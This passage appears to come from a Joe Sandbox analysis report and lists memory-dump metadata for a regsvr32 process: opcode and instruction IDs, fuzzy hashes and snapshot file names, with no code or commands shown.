                                                                              • Instruction Fuzzy Hash: 1021D87061CB558BDB44EE4CC89592AFBE1FFE9B80F10482DE145932A4CA35F841DB96
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 41509b2f4db04b31368ecbfa596835b321207f8e1bf6f4846f12575c40abf0fd
                                                                              • Instruction ID: ea7e09bbc16eb30925042cfe63fe50ae0421502be6f38fcb6195c75105971e6f
                                                                              • Opcode Fuzzy Hash: 41509b2f4db04b31368ecbfa596835b321207f8e1bf6f4846f12575c40abf0fd
                                                                              • Instruction Fuzzy Hash: 5E110122A0EA9D4FF742E728D8A51A8BFA0EF42218F1801F7D018DA0E7DD245985C765
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f5ec631f44e461638280084a1a4ed7b829d9df437ba436eb18ff751ab4e7cb14
                                                                              • Instruction ID: 99ac3aec119dd02677326f8ab4a9476c5e61d7ff83b4b0fbd0b3310753ffe59c
                                                                              • Opcode Fuzzy Hash: f5ec631f44e461638280084a1a4ed7b829d9df437ba436eb18ff751ab4e7cb14
                                                                              • Instruction Fuzzy Hash: 2311C631A0C51D8FE768DA08D8A25B8BBE0EF8D321F00017ED05EE3696DF257C42C668
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9f76214550a20510dd4e8b241d713a0f817e5ab80b5a0ed8a9697e36b5fbaa51
                                                                              • Instruction ID: bd002468f09ae09fd4b214772a09cf7d060039fc27a64cd5b0fc9880d6b829d3
                                                                              • Opcode Fuzzy Hash: 9f76214550a20510dd4e8b241d713a0f817e5ab80b5a0ed8a9697e36b5fbaa51
                                                                              • Instruction Fuzzy Hash: D011FE316085188FDB58DF18E455AA9B7E1FB99311F1041AFD04EE3666DE31AD428B44
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c784fc741932d0e81af9bce6803d3c1c419d7df7f76e71ba7a755eca14c30dab
                                                                              • Instruction ID: c47277c1ff8f4affd3fda32e11ac3390ab9ba0f185e3fc078fda09c68eaf9bec
                                                                              • Opcode Fuzzy Hash: c784fc741932d0e81af9bce6803d3c1c419d7df7f76e71ba7a755eca14c30dab
                                                                              • Instruction Fuzzy Hash: B411A16250E6E44FE79297389875AA07FF0EF9721070901EBE089CB1E7D918A845C762
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b81f442ae956b0dda5273be3d7c56751e0877131bb1bf919dfa5d6b18e65c8af
                                                                              • Instruction ID: 80ee16252f096677dbd4f77f33b0d7913a64fa5c8cc2ef88d5a928720ba9a943
                                                                              • Opcode Fuzzy Hash: b81f442ae956b0dda5273be3d7c56751e0877131bb1bf919dfa5d6b18e65c8af
                                                                              • Instruction Fuzzy Hash: 9D110621A0DBCA4FD712D72498B16A9BFB1EF43210B4A41E7D049D74D7D9186845C762
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db81557532782346f23aeb99bc6aa06c95a67aa5968c7064e6f466c1ca2852be
                                                                              • Instruction ID: e4641b7a468957b4131c4632818261acc2de7e4b0b8beb268fb7d0b93d8a54c9
                                                                              • Opcode Fuzzy Hash: db81557532782346f23aeb99bc6aa06c95a67aa5968c7064e6f466c1ca2852be
                                                                              • Instruction Fuzzy Hash: C601E121B1882D5FEBD4FB58D4A66BCB6A2FF88210F440139D11EF32CACE296801D774
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 95a2e5f3a0308a8939ebc3e6ba7628e4bff6ea8c3c7676415de554a7fdea81d3
                                                                              • Instruction ID: ebe864e728f083fe0207fc83881740ec48ddbd07dd0c93a4c9ca08c726983225
                                                                              • Opcode Fuzzy Hash: 95a2e5f3a0308a8939ebc3e6ba7628e4bff6ea8c3c7676415de554a7fdea81d3
                                                                              • Instruction Fuzzy Hash: 19014751B1DDAA4FE748E62C88F5170BBD2EF49210B0801BAD00CF32CADD08AC09C772
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: